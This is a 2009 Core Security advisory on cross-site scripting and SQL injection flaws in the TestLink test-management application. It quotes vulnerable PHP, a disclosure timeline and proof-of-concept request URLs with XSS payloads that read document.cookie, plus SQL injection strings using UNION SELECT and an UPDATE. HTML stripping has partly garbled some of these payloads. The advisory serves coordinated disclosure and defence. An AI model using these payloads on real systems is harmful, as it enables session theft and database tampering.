AOH :: HP Unsorted M :: BU-1222.HTM

Multiple XSS and Injection Vulnerabilities in TestLink Test Management and Execution System [CORE Security Technologies



CORE-2009-1013: Multiple XSS and Injection Vulnerabilities in TestLink Test Management and Execution System
CORE-2009-1013: Multiple XSS and Injection Vulnerabilities in TestLink Test Management and Execution System



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
                                Core Security Technologies - CoreLabs
Advisory
                                        
http://www.coresecurity.com/corelabs/ 

Multiple XSS and Injection Vulnerabilities in TestLink Test Management
and Execution System


1. *Advisory Information*

Title: Multiple XSS and Injection Vulnerabilities in TestLink Test
Management and Execution System
Advisory Id: CORE-2009-1013
Advisory URL:
http://www.coresecurity.com/content/testlink-multiple-injection-vulnerabilities 
Date published: 2009-12-09
Date of last update: 2009-12-09
Vendors contacted: TestLink Community
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Cross site scripting [CWE-79], SQL injection [CWE-89]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 37258
CVE Name: CVE-2009-4237, CVE-2009-4238


3. *Vulnerability Description*

 Multiple injection (both XSS [1] and SQL) vulnerabilities have been
discovered in Testlink [2], a widely used test-case management
application written in PHP [3]. One of the XSS vulnerabilities,
discovered in its login screen, can be exploited without an
authenticated session.


4. *Vulnerable packages*

   . TestLink 1.8.0
   . TestLink 1.8.1
   . TestLink 1.8.2
   . TestLink 1.8.3
   . TestLink 1.8.4
   . Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

   . TestLink 1.8.5


6. *Solutions and Workarounds*

 Upgrade to a non-vulnerable version, such as 1.8.5. TestLink features
the option to upgrade a current installation in its install scripts.


7. *Credits*

 These vulnerabilities were discovered and researched by Pablo
Annetta, from Core Security Technologies, during Core Bugweek 2009 as
a member of the "Los Herederos de Don Pablo (HDP)" team.


8. *Technical Description / Proof of Concept Code*

 Most of these vulnerabilities are present in the Testlink code
because the logic for the sanitization of user input is rudimentary.
Each script sanitizes its own input, instead of abstracting this task
to another layer of logic. Often only slashes are stripped, but html
entities are almost never escaped.

 The only vulnerability in this report that can be exploited without
an authenticated session is a XSS vulnerability in Testlink's login
page 'login.php'. This script gets a parameter named 'req', which is
used by the application to set the next request to be made. All
parameters are initialized in the 'init_args' function which doesn't
sanitize its arguments appropriately as seen below.

/-----
function init_args()
{
    $args = new stdClass();
    $_REQUEST = strings_stripSlashes($_REQUEST);
    
    $args->note = isset($_REQUEST['note']) ? $_REQUEST['note'] : null;
    $args->login = isset($_REQUEST['tl_login']) ?
trim($_REQUEST['tl_login']) : null;
    $args->pwd = isset($_REQUEST['tl_password']) ?
$_REQUEST['tl_password'] : null;

    $args->reqURI = isset($_REQUEST['req']) ? $_REQUEST['req'] : null;
    $args->preqURI = (isset($_REQUEST['reqURI']) &&
strlen($_REQUEST['reqURI'])) ? $_REQUEST['reqURI'] : null;
 
    return $args;
}
- -----/

 This vulnerability can be verified by issuing the following request
to a Testlink installation on localhost:

/-----
http://127.0.0.1/testlink/login.php?req="> src 
="http://www.coresecurity.com/content/xxxx" width="100%" 
height="300">
- -----/


 Other XSS vulnerabilities on different scripts can be exploited with
an authenticated session. Proof of concept code follows:

/-----
 

http://127.0.0.1/testlink/lib/attachments/attachmentupload.php?id=1&tableName=' 
alert(document.cookie)http://127.0.0.1/testlink/lib/events/eventviewer.php?startDate=" 
alert(document.cookie)http://127.0.0.1/testlink/lib/events/eventviewer.php?endDate=" 
alert(document.cookie)http://127.0.0.1/testlink/lib/events/eventviewer.php?logLevel=" 
- -----/


 There are more XSS attacks that can be executed with *an
authenticated session* on installations that have *at least one test
plan created*. Most of these are due to an 'echo' statement in
TestLink's database functions that directly outputs SQL errors back to
the browser without escaping html entities. This can be found on line
181 of 'testlink/lib/functions/database.class.php', where some
function such as 'htmlspecialchars' should be called on '
$this->error($p_query)' and '$message'. A templating engine (TestLink
uses Smarty for many other tasks) could also be used to output these
errors.

/-----
if ( !$t_result ) {
    echo "ERROR ON exec_query() - database.class.php 
" . $this->error($p_query) . "
"; echo "
THE MESSAGE :: $message. "
"; return false; } else { return $t_result; } - -----/ This proof of concept code triggers the vulnerabilities described above: /----- http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&expected_results=' http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&name= http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&steps= http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary=' - -----/ More XSS vulnerabilities can also be triggered because of the problem described above, but also because another independent XSS exists on 'resultsMoreBuilds_buildReport.php' caused by not escaping the 'search_notes_string', by issuing this request (also when logged into an installation with a Test Plan created): /----- http://127.0.0.1/testlink/lib/results/resultsMoreBuilds_buildReport.php?report_type=0&display_query_params=1&search_notes_string= - -----/ With an authenticated session, the following SQL injection bug can also be exploited. In 'http://127.0.0.1/testlink/lib/general/navBar.php', filling in the 'Test Case ID' field with 'TC-1 or 1 = 1 update tcversions set summary = ''' results in reflected HTML. Also with an authenticated session the following blind SQL injection exists /----- http://127.0.0.1/testlink/lib/events/eventviewer.php?logLevel=1,1)%20union%20SELECT%20id%20FROM%20testplans%20%23 - -----/ 9. *Report Timeline* . 2009-10-29: Core Security Technologies notifies Toshiyuki Kawanishi (at his @users.sourceforge.jp address) from the Teamst team of the vulnerabilities, offering a draft for this advisory in plaintext or encrypted form (if proper keys are sent). November 9th, 2009, is proposed as a release date. . 2009-11-02: Because no response was obtained from Toshiyuki at his @users.sourceforge.jp, Core Security Technologies tries to contact him using the "Contact" webform in http://www.teamst.org. . 2009-11-09: Since there is still no reply from Toshiyuki, Core now tries contacting Francisco Mancardi. November 23rd is now proposed as a release date. . 2009-11-09: Francisco Mancardi replies asking that a copy in plaintext of the advisory be sent to him, and also to Toshiyuki Kawanishi and Martin Havlat. . 2009-11-09: Core sends a draft for this advisory, including the technical description of the vulnerabilities, to Francisco Mancardi, Toshiyuki Kawanishi and Martin Havlat. . 2009-11-10: Martin Havlat replies acknowledging reception of the advisory draft, and tells Core that internal issue #2947 has been created in their bug tracking system to fix these bugs. He mentions these issues shall be fixed on release 1.8.5 of TestLink. . 2009-11-12: Core replies asking for more information regarding the release date of TestLink 1.8.5. An account is created by Core in TestLink's internal bug tracking system to access information about issue #2947. . 2009-11-17: Core requests again information regarding the release date of TestLink 1.8.5 in order to schedule the release of this advisory accordingly, since no reply on this has been yet given by the TestLink developers contacted. Core also mentions that issue #2947 cannot be accessed by the user created in order to follow the development of a patch for the vulnerabilities reported here. . 2009-11-17: Francisco Mancardi replies specifying that "maybe [issue #2947] has private status". . 2009-11-20: Core asks once more for a release date for a fixed version of TestLink. The advisory is rescheduled for release on Monday 30th, November, since there is no information regarding the possibility of meeting the deadline of Monday 23rd by the TestLink team. Core also mentions that they are eager to passively monitor the progress of the TestLink developers in fixing these issues if access is given to issue #2947 to their created account on TestLink's bug tracking system. . 2009-11-26: Since there was no reply to their last e-mail, Core resends it, reminding the developers that their planned release date for the advisory is Monday 30th, and that they would like to know if there is a planned release date for a fixed version of TestLink. Core reminds the developers about their commitment in helping them in correctly fixing the bug, should they get access to private issue #2947. . 2009-11-27: Martin Havlat replies that due to priorities in the internal development group of Testlink the bug has not yet been fixed. He commits to release TestLink 1.8.5 as soon as this bug is fixed, but besides stating that he wished to have time to fix this himself, no firm or verifiable claim is made that can assure Core of a planned fix and release. . 2009-11-27: Core reschedules its internal publication date for this advisory to December 14th. This will be the final date and a user-release will be made, unless TestLink developers share information that can be verified by Core that shows commitment to eventually looking into said bugs and fixing them. Core suggests that developers actually in charge of these issues are copied in the e-mail loop, or that access to internal issue-tracking tools be given to them to actively participate in the discussions and the patching process. . 2009-11-30: Martin Havlat asks for technical details needed by him to confirm some of these vulnerabilities. . 2009-12-01: Core replies with the technical details needed by Martin Havlat. . 2009-12-02: Martin Havlat sends a patched version of TestLink to Core asking for verification of fixes to some of the vulnerabilities reported in this advisory. . 2009-12-03: Core replies saying that the fixes proposed by Martin Havlat fail to patch those specific vulnerabilities. The bugs are further researched by Core and the advisory draft is modified to include a more detailed explanation of these bugs. This technical information is shared by Core with Martin Havlat and some insight into possible fixes is also given. . 2009-12-09: TestLink 1.8.5 is released. . 2009-12-09: Advisory CORE-2009-1013 is published. 10. *References* [1] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) [2] http://www.teamst.org/ [3] http://www.owasp.org/index.php/PHP_Top_5 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: GnuPT v3.6.3 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksgL9IACgkQyNibggitWa3csgCfdV5dyeDFf1r+/yNIO6PpDgvk LJgAoKTesYDuoe6SpJzMhPKujbi1Z0vV =H22d -----END PGP SIGNATURE-----

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.